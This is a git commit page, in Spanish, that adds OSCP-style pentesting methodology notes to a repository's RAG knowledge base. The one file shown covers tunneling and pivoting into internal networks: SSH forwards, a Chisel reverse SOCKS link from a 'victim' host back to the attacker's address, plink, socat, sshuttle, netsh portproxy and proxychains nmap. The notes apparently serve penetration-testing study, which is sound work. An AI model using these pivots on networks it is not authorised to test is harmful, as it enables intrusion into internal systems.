saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
This commit is contained in:
parent
12987539a4
commit
7e06ce46cf
76 changed files with 2682 additions and 8 deletions
45
nucleo/saber/conocimiento/08 - Avanzado/Tunneling.md
Normal file
45
nucleo/saber/conocimiento/08 - Avanzado/Tunneling.md
Normal file
|
|
@ -0,0 +1,45 @@
|
|||
# Tunneling y port forwarding
|
||||
|
||||
> Reenviar puertos y montar proxies para alcanzar redes internas. Alternativas a Pivoting ligolo-ng. Fuente: oscp.trastero.org/tunneling.
|
||||
|
||||
## SSH (el más portable)
|
||||
```bash
|
||||
ssh -L 8080:127.0.0.1:80 user@pivot # LOCAL: tu :8080 → servicio interno
|
||||
ssh -R 3390:127.0.0.1:3389 user@kali # REMOTE: expone el RDP del pivot en tu :3390
|
||||
ssh -D 1080 user@pivot # DYNAMIC: proxy SOCKS en tu :1080
|
||||
# luego: proxychains <herramienta> (configura socks en /etc/proxychains4.conf)
|
||||
```
|
||||
|
||||
## Chisel (cuando no hay SSH)
|
||||
```bash
|
||||
# Kali (servidor):
|
||||
./chisel server -p 8000 --reverse
|
||||
# Víctima (cliente) → SOCKS reverso:
|
||||
./chisel client TU_IP:8000 R:socks
|
||||
# ahora: proxychains nmap -sT -Pn 192.168.5.10
|
||||
```
|
||||
|
||||
## socat (redirección simple)
|
||||
```bash
|
||||
socat TCP-LISTEN:8080,fork TCP:192.168.5.10:80
|
||||
```
|
||||
|
||||
## Plink (SSH desde Windows)
|
||||
```cmd
|
||||
plink.exe -R 3390:127.0.0.1:3389 user@TU_IP
|
||||
```
|
||||
|
||||
## sshuttle (VPN improvisada, lo más cómodo)
|
||||
```bash
|
||||
sshuttle -r user@pivot 192.168.5.0/24 --dns
|
||||
```
|
||||
|
||||
## Windows nativo — netsh portproxy
|
||||
```cmd
|
||||
netsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.5.10 connectport=80
|
||||
```
|
||||
|
||||
## proxychains
|
||||
- `proxychains nmap -sT -Pn IP` → usa `-sT` (TCP connect): el SYN scan **no** pasa por el proxy. Ver Nmap NSE.
|
||||
|
||||
Relacionado: Pivoting ligolo-ng · Movimiento lateral · Puesto de mando Kali · OSCP MOC
|
||||
Loading…
Add table
Add a link
Reference in a new issue